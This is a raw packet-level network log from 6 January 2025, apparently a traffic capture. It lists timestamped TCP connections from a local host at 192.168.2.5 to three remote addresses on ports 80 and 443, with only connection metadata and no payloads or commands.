                                                                                                                                          Jan 6, 2025 07:54:06.649916887 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649929047 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649939060 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649950981 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649961948 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649970055 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.649974108 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.649981022 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.650000095 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.650059938 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.650109053 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653296947 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653346062 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653356075 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653395891 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653395891 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653407097 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653418064 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653428078 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653434038 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653441906 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653451920 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653469086 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653495073 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653532028 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653585911 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653587103 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653599024 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653635979 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653655052 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653666973 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653677940 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653687954 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653706074 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653719902 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653759956 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653770924 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653781891 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653793097 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653804064 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653804064 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653839111 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653877974 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653888941 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653898954 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653908968 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653925896 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653929949 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653937101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653939962 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653949022 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653954029 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653956890 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.653960943 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653971910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653983116 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.653995991 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654022932 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654030085 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654036999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654047966 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654058933 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654068947 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654073000 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654099941 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654108047 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654112101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654129028 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654139996 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654150963 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654154062 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654161930 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654191971 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654191971 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654215097 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654226065 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654236078 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654251099 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654256105 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654263020 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654268026 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654280901 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654310942 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654357910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654373884 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654383898 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654395103 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654400110 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654407978 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654418945 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654431105 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654434919 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654443026 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654452085 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654469013 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654479027 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654485941 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.654488087 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.654524088 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.717616081 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.780998945 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781023026 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781033993 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781053066 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781064987 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781088114 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781100035 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781114101 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781119108 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781130075 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781138897 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781141996 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781172037 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781191111 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781203032 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781213999 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781232119 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781255960 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781259060 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781277895 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781290054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781301975 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781318903 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781347036 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781352997 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781358957 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781369925 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781403065 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781411886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781421900 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781428099 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781434059 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781470060 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781900883 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781913042 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781925917 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781939030 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781943083 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781958103 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781970024 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.781970978 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781986952 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.781996012 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782000065 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782008886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782020092 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782021999 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782052040 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782061100 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782063007 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782092094 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782432079 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782450914 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782464027 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782474041 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782507896 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782583952 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782601118 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782613039 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782618046 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782623053 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782629013 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782639980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782649994 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782653093 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782661915 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782680988 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782691956 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782701969 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782711983 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782728910 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782737017 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782761097 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782780886 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782793045 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782804012 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782819986 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782823086 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782850027 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782901049 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782923937 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782936096 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.782959938 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.782982111 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783001900 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783013105 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783025980 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783042908 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783052921 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783060074 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783092976 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783112049 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783123016 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783128023 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783173084 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783205032 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783210039 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783221960 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783235073 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783252001 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783262968 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783265114 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783278942 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783297062 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783307076 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783307076 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783324957 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783327103 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783345938 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783354998 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783359051 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783370018 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783380985 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783399105 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783432007 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783565044 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783576965 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783593893 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783603907 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783610106 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783621073 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783632040 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783642054 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783653021 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783663988 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783674955 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783680916 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783691883 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:06.783802986 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:10.985234022 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:10.990184069 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:10.990288973 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:10.990698099 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:10.995518923 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:11.334299088 CET8049713166.62.27.188192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:11.334382057 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:11.478923082 CET4971380192.168.2.5166.62.27.188
                                                                                                                                          Jan 6, 2025 07:54:11.775665998 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:11.818860054 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:11.823829889 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:12.103647947 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:12.243144035 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:12.873930931 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:12.873997927 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:12.874095917 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:12.901220083 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:12.901259899 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.389662981 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.389750004 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.408114910 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.408154964 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.408505917 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.503930092 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.551337957 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.616966963 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.617033958 CET44349726188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.617156982 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.705919981 CET49726443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.717377901 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:13.722117901 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.988286972 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.990950108 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.990978003 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:13.991084099 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.991415024 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:13.991434097 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.133785963 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.448868036 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.470297098 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:14.470316887 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.591486931 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.591556072 CET44349730188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.591622114 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:14.594322920 CET49730443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:14.612085104 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.614706039 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.618020058 CET8049723132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.618146896 CET4972380192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.620033026 CET8049731132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:14.621299028 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.624490023 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:14.629303932 CET8049731132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.370594025 CET8049731132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.372668028 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.372700930 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.372802019 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.373209953 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.373218060 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.515041113 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:15.826606989 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.828641891 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.828671932 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.975275040 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.975337982 CET44349733188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.975406885 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.976274014 CET49733443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:15.981642962 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:15.983030081 CET4973680192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:15.986649990 CET8049731132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:15.986728907 CET4973180192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:15.987911940 CET8049736132.226.8.169192.168.2.5
